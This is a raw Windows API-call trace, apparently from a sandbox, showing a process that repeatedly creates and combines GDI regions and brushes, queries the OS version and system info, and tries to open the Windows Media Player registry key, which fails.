[0090.470] CreateSolidBrush (color=0xff) returned 0x2105859 [0090.470] CreateSolidBrush (color=0xff0000) returned 0x110585c [0090.470] DeleteObject (ho=0x110585c) returned 1 [0090.470] DeleteObject (ho=0x380401dc) returned 1 [0090.470] DeleteObject (ho=0x3a0401d9) returned 1 [0090.470] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.470] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.470] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.470] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.470] BeginPath (hdc=0x0) returned 0 [0090.470] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.470] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.470] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.470] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.470] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.470] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x390401dc [0090.470] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b0401d9 [0090.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104585d [0090.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104585e [0090.470] CombineRgn (hrgnDst=0x104585d, hrgnSrc1=0x390401dc, hrgnSrc2=0x3b0401d9, iMode=1) returned 1 [0090.470] CombineRgn (hrgnDst=0x104585e, hrgnSrc1=0x390401dc, hrgnSrc2=0x3b0401d9, iMode=4) returned 2 [0090.470] CreateSolidBrush (color=0xff) returned 0x210585c [0090.470] CreateSolidBrush (color=0xff0000) returned 0x110585f [0090.470] DeleteObject (ho=0x110585f) returned 1 [0090.470] DeleteObject (ho=0x3b0401d9) returned 1 [0090.470] DeleteObject (ho=0x390401dc) returned 1 [0090.470] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.471] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.471] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.471] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.471] BeginPath (hdc=0x0) returned 0 [0090.471] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.471] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.471] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.471] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.471] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c0401d9 [0090.471] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a0401dc [0090.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045860 [0090.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045861 [0090.471] CombineRgn (hrgnDst=0x1045860, hrgnSrc1=0x3c0401d9, hrgnSrc2=0x3a0401dc, iMode=1) returned 1 [0090.471] CombineRgn (hrgnDst=0x1045861, hrgnSrc1=0x3c0401d9, hrgnSrc2=0x3a0401dc, iMode=4) returned 2 [0090.471] CreateSolidBrush (color=0xff) returned 0x210585f [0090.471] CreateSolidBrush (color=0xff0000) returned 0x1105862 [0090.471] DeleteObject (ho=0x1105862) returned 1 [0090.471] DeleteObject (ho=0x3a0401dc) returned 1 [0090.471] DeleteObject (ho=0x3c0401d9) returned 1 [0090.471] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.471] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.472] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.472] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.472] BeginPath (hdc=0x0) returned 0 [0090.472] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.472] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.472] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.472] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.472] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b0401dc [0090.472] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d0401d9 [0090.472] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045863 [0090.472] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045864 [0090.472] CombineRgn (hrgnDst=0x1045863, hrgnSrc1=0x3b0401dc, hrgnSrc2=0x3d0401d9, iMode=1) returned 1 [0090.472] CombineRgn (hrgnDst=0x1045864, hrgnSrc1=0x3b0401dc, hrgnSrc2=0x3d0401d9, iMode=4) returned 2 [0090.472] CreateSolidBrush (color=0xff) returned 0x2105862 [0090.472] CreateSolidBrush (color=0xff0000) returned 0x1105865 [0090.472] DeleteObject (ho=0x1105865) returned 1 [0090.472] DeleteObject (ho=0x3d0401d9) returned 1 [0090.472] DeleteObject (ho=0x3b0401dc) returned 1 [0090.472] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.472] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.472] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.472] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.472] BeginPath (hdc=0x0) returned 0 [0090.472] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.472] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.472] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.473] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e0401d9 [0090.473] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c0401dc [0090.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045866 [0090.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045867 [0090.473] CombineRgn (hrgnDst=0x1045866, hrgnSrc1=0x3e0401d9, hrgnSrc2=0x3c0401dc, iMode=1) returned 1 [0090.473] CombineRgn (hrgnDst=0x1045867, hrgnSrc1=0x3e0401d9, hrgnSrc2=0x3c0401dc, iMode=4) returned 2 [0090.473] CreateSolidBrush (color=0xff) returned 0x2105865 [0090.473] CreateSolidBrush (color=0xff0000) returned 0x1105868 [0090.473] DeleteObject (ho=0x1105868) returned 1 [0090.473] DeleteObject (ho=0x3c0401dc) returned 1 [0090.473] DeleteObject (ho=0x3e0401d9) returned 1 [0090.473] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.473] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.473] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.473] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.473] BeginPath (hdc=0x0) returned 0 [0090.473] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.473] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.473] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.474] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d0401dc [0090.474] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f0401d9 [0090.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045869 [0090.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104586a [0090.474] CombineRgn (hrgnDst=0x1045869, hrgnSrc1=0x3d0401dc, hrgnSrc2=0x3f0401d9, iMode=1) returned 1 [0090.474] CombineRgn (hrgnDst=0x104586a, hrgnSrc1=0x3d0401dc, hrgnSrc2=0x3f0401d9, iMode=4) returned 2 [0090.474] CreateSolidBrush (color=0xff) returned 0x2105868 [0090.474] CreateSolidBrush (color=0xff0000) returned 0x110586b [0090.474] DeleteObject (ho=0x110586b) returned 1 [0090.474] DeleteObject (ho=0x3f0401d9) returned 1 [0090.474] DeleteObject (ho=0x3d0401dc) returned 1 [0090.474] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.474] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.474] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.474] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.474] BeginPath (hdc=0x0) returned 0 [0090.474] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.474] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.474] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.474] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.475] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x400401d9 [0090.475] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e0401dc [0090.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104586c [0090.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104586d [0090.475] CombineRgn (hrgnDst=0x104586c, hrgnSrc1=0x400401d9, hrgnSrc2=0x3e0401dc, iMode=1) returned 1 [0090.475] CombineRgn (hrgnDst=0x104586d, hrgnSrc1=0x400401d9, hrgnSrc2=0x3e0401dc, iMode=4) returned 2 [0090.475] CreateSolidBrush (color=0xff) returned 0x210586b [0090.475] CreateSolidBrush (color=0xff0000) returned 0x110586e [0090.475] DeleteObject (ho=0x110586e) returned 1 [0090.475] DeleteObject (ho=0x3e0401dc) returned 1 [0090.475] DeleteObject (ho=0x400401d9) returned 1 [0090.475] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.475] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.475] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.475] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.475] BeginPath (hdc=0x0) returned 0 [0090.475] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.475] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.475] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.475] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.475] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f0401dc [0090.475] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x410401d9 [0090.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104586f [0090.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045870 [0090.475] CombineRgn (hrgnDst=0x104586f, hrgnSrc1=0x3f0401dc, hrgnSrc2=0x410401d9, iMode=1) returned 1 [0090.475] CombineRgn (hrgnDst=0x1045870, hrgnSrc1=0x3f0401dc, hrgnSrc2=0x410401d9, iMode=4) returned 2 [0090.476] CreateSolidBrush (color=0xff) returned 0x210586e [0090.476] CreateSolidBrush (color=0xff0000) returned 0x1105871 [0090.476] DeleteObject (ho=0x1105871) returned 1 [0090.476] DeleteObject (ho=0x410401d9) returned 1 [0090.476] DeleteObject (ho=0x3f0401dc) returned 1 [0090.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.476] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.476] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.476] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.476] BeginPath (hdc=0x0) returned 0 [0090.476] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.476] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.476] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.476] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.476] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x420401d9 [0090.476] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x400401dc [0090.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045872 [0090.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045873 [0090.476] CombineRgn (hrgnDst=0x1045872, hrgnSrc1=0x420401d9, hrgnSrc2=0x400401dc, iMode=1) returned 1 [0090.476] CombineRgn (hrgnDst=0x1045873, hrgnSrc1=0x420401d9, hrgnSrc2=0x400401dc, iMode=4) returned 2 [0090.476] CreateSolidBrush (color=0xff) returned 0x2105871 [0090.476] CreateSolidBrush (color=0xff0000) returned 0x1105874 [0090.476] DeleteObject (ho=0x1105874) returned 1 [0090.476] DeleteObject (ho=0x400401dc) returned 1 [0090.476] DeleteObject (ho=0x420401d9) returned 1 [0090.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.477] BeginPath (hdc=0x0) returned 0 [0090.477] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.477] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.477] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.477] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.477] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x410401dc [0090.477] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x430401d9 [0090.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045875 [0090.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045876 [0090.477] CombineRgn (hrgnDst=0x1045875, hrgnSrc1=0x410401dc, hrgnSrc2=0x430401d9, iMode=1) returned 1 [0090.477] CombineRgn (hrgnDst=0x1045876, hrgnSrc1=0x410401dc, hrgnSrc2=0x430401d9, iMode=4) returned 2 [0090.477] CreateSolidBrush (color=0xff) returned 0x2105874 [0090.477] CreateSolidBrush (color=0xff0000) returned 0x1105877 [0090.477] DeleteObject (ho=0x1105877) returned 1 [0090.477] DeleteObject (ho=0x430401d9) returned 1 [0090.477] DeleteObject (ho=0x410401dc) returned 1 [0090.477] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.477] 